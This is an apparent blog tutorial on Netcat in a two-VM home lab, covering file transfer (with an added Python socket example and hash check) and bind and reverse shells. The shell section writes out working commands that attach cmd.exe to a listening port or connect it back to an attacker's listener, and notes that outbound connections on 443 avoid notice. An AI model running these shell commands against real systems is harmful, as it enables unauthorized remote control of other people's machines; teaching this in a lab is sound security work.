What is Netcat?
Netcat is often called the Swiss-army knife of information security. Basically it is a more powerful version of the classic Telnet client: it reads and writes raw TCP (and UDP) connections, which makes it usable for chatting, file transfer, port scanning, banner grabbing, opening remote shells and even setting up a honeypot. An important feature of Netcat is that it can act both as a client and as a server (more detail later). In this blog post I'll walk through some practical examples of the different uses of Netcat. I won't show you how to chat or do a port scan with Netcat because there are better tools available for those purposes. Good to know: Netcat is available for both Linux and Windows.
1. File transfer with Netcat
Netcat is a great tool to send files over the network from one machine to another. In my lab I am running two virtual machines (Kali Linux and Windows 7) on VirtualBox. Both use a bridged network adapter, so they are part of my internal network. Both machines have Netcat installed.
On the Windows 7 machine we created a simple text file (zero-day.txt) that we want to send to the Kali Linux machine. The Windows 7 machine's IP address is 192.168.0.249; Kali's IP address is 192.168.0.114.
Step 1: start the listener on Kali Linux (the receiving side must be up before the sender connects, otherwise the sender's connection is simply refused)
nc -lvp 1234 > zeroday.txt
- nc (run Netcat)
- -lvp 1234 (Listen Verbosely on Port 1234)
- > zeroday.txt (redirect any data received on the connection into a file called zeroday.txt)
Depending on the Netcat variant, -p may be rejected in combination with -l (the original OpenBSD Netcat does this); in that case nc -lv 1234 does the same thing.
Step 2: send the file from the Windows VM to the Kali VM
nc 192.168.0.114 1234 < zero-day.txt
The command above is so simple that it requires little further explanation: the syntax is nc target_ip port < file.txt, and Netcat just streams the raw bytes of the file over the TCP connection. When the file has been sent, close the connection (Ctrl+C on the sending side if it does not exit by itself); the Kali side then exits as well.
Two things Netcat does not do for you: it gives no signal that the transfer is complete or intact, so compare a hash on both sides (for example sha256sum zeroday.txt on Kali and certutil -hashfile zero-day.txt SHA256 on Windows), and it neither encrypts nor authenticates anything, so whoever connects to port 1234 first gets to write zeroday.txt and anyone on the path can read the file. Fine in a lab, not on a network you do not control.
In the left screenshot we cat the file on Kali and you can see it's indeed the text file from our Windows VM.
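To make concrete what the two commands above do on the wire, here is an added example (my own code, not the blog's) that re-implements the receiving side (nc -lvp PORT > file) and the sending side (nc HOST PORT < file) with plain Python sockets over loopback, and adds the hash check and the start-order check that Netcat itself does not give you. The loopback address, the OS-assigned port and the file contents are constructed for the demonstration.

```python
"""Minimal re-implementation of `nc -lvp PORT > zeroday.txt` and
`nc TARGET PORT < zero-day.txt` with plain sockets, plus the hash check
Netcat does not do. Added example, not the blog's own code; hosts, ports
and file contents are constructed."""
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 65536


def sha256_of(path):
    """Hash a file in chunks (what you would do with sha256sum / certutil)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def start_receiver(dest_path, port=0):
    """Receiving side, the equivalent of `nc -lvp PORT > dest`.

    Binds and listens immediately (so a sender can connect), then accepts ONE
    connection in a background thread and writes every byte it receives to
    dest until the peer closes (recv returns b""). Nothing checks who
    connected: whoever reaches the port first gets to write the file.
    Returns (thread, port); port=0 lets the OS pick a free port (nc used 1234).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    srv.settimeout(10)
    actual_port = srv.getsockname()[1]

    def run():
        conn, _peer = srv.accept()
        srv.close()  # single-shot, like nc without -k
        with conn, open(dest_path, "wb") as out:
            for block in iter(lambda: conn.recv(CHUNK), b""):  # b"" == EOF
                out.write(block)

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t, actual_port


def send_file(src_path, host, port):
    """Sending side, the equivalent of `nc HOST PORT < src`: stream the raw
    file bytes, then shut down the write side so the receiver sees EOF."""
    with socket.create_connection((host, port), timeout=10) as s, open(src_path, "rb") as f:
        s.sendfile(f)
        s.shutdown(socket.SHUT_WR)


def demo():
    """Run the transfer over loopback and verify it like a practitioner would."""
    payload = b"constructed sample: zero-day notes\n" * 1000  # constructed content
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "zero-day.txt")
        dst = os.path.join(d, "zeroday.txt")
        with open(src, "wb") as f:
            f.write(payload)

        # 1. listener first, 2. then the sender: the order matters
        thread, port = start_receiver(dst)
        send_file(src, "127.0.0.1", port)
        thread.join(10)

        # 3. Netcat gives no completion or integrity signal, so compare hashes
        match = sha256_of(src) == sha256_of(dst)

        # 4. with the listener gone, a sender is refused: this is exactly what
        #    happens when the sending command is run before the listening one
        try:
            send_file(src, "127.0.0.1", port)
            refused = False
        except ConnectionRefusedError:
            refused = True

        return {"sha256_match": match, "bytes": os.path.getsize(dst),
                "refused_without_listener": refused}


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the three things worth remembering from this section: the listener has to exist before the sender connects, the end of the file is signalled only by closing the write side of the connection, and the only way to know the file arrived intact is to hash it on both ends.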
2. Reverse shell and remote shell with Netcat
Getting a reverse or bind shell is one of the key goals in offensive security. First it's important to understand the difference between a remote (bind) shell and a reverse shell.
A remote shell (or bind shell) is when you bind a shell to a local port on one machine, and another machine connects to that port to use the shell remotely.
A reverse shell is when the shell on the target connects back to your machine, which is listening for that connection.
Which one to use depends on the network. Let's look at the scenario below (source):
Dennis has a computer connected to the internet but inside a NAT network, whilst Sophie is directly connected to the internet. Sophie's computer is directly reachable from the internet, but Dennis' system is not, because it sits behind NAT.
If Dennis needs a shell on Sophie's computer, he can use a bind shell: Sophie starts Netcat listening on a port with her shell attached to it, and Dennis connects to that port. Once connected, Dennis has Sophie's shell and can execute commands through it.
If Sophie wants a shell on Dennis' computer, she cannot connect to it because his system is not publicly reachable. To overcome this, Sophie starts listening for incoming connections, while Dennis runs Netcat with his shell attached and connects out to Sophie. Once connected, Sophie has access to Dennis' shell and can execute commands as well.
So basically: with a bind shell you connect from your machine to the shell; with a reverse shell the shell connects to a listening service (Netcat) on your machine. In practice reverse shells are by far the more common choice, because a target behind NAT or an inbound firewall can usually still make outbound connections, and an outbound connection to a common port like 443 is much less likely to be blocked or noticed than a new listening port on the target.
Example 1: get a remote shell via Netcat
Let's start simply by demonstrating how you can get a remote shell with Netcat from one machine to another. In this example we bind the shell on the Windows VM and connect to it from the Kali VM.
Windows VM side:
nc -lvp 1234 -e cmd.exe
- nc (run Netcat)
- -lvp 1234 (Listen Verbosely on Port 1234, an arbitrarily chosen port)
- -e cmd.exe (execute cmd.exe and attach its input and output to the connection)
Kali VM side:
nc 192.168.0.249 1234
- nc (run Netcat)
- 192.168.0.249 1234 (IP of the Windows VM + chosen port)
Note: if you would like to bind a Linux shell instead of a Windows shell to Netcat, use /bin/bash (or /bin/sh) instead of cmd.exe. Also note that -e only exists in Netcat builds compiled with it (the original code calls the option GAPING_SECURITY_HOLE for a reason): the OpenBSD Netcat shipped by many Linux distributions does not have it, while Ncat from the Nmap project offers -e/--exec and --sh-exec. If your nc refuses -e, that is why.
Example 2: get a reverse shell via Netcat
Next, we'll try getting a reverse shell. Instead of the attacking machine connecting to the target machine like in the first example, we now bind the shell on the target machine to Netcat and have it initiate the connection to the attacking machine. My Kali IP address in this exercise is 192.168.0.240.
Kali VM side (start this first, so the listener is up when the target connects back):
ncat -lvp 1234
Windows VM side:
nc 192.168.0.240 1234 -e cmd.exe
As soon as the Windows side connects, the Kali terminal shows a cmd.exe prompt. Note that the listener here is Ncat (Nmap's Netcat implementation); the plain nc -lvp 1234 from the file-transfer example works just as well for the listening side, since the listener only needs to read and write the raw connection.
Real-life scenarios
In offensive security, getting a reverse shell is a very big step in compromising a system. Unfortunately, in real-life scenarios Netcat is usually not available on the target and you have no immediate way to install or run it. For any method to work, the attacker either needs to be able to execute arbitrary commands on the system (your options are then limited by the interpreters installed on the target, such as Bash, Perl, Python, PowerShell, ...) or must be able to upload a file that gets executed when it is opened from the browser, for example a PHP reverse-shell script. In both cases the target side of the connection is written in that language instead of relying on nc -e, while the attacker's side still only needs a listener such as nc -lvp 1234.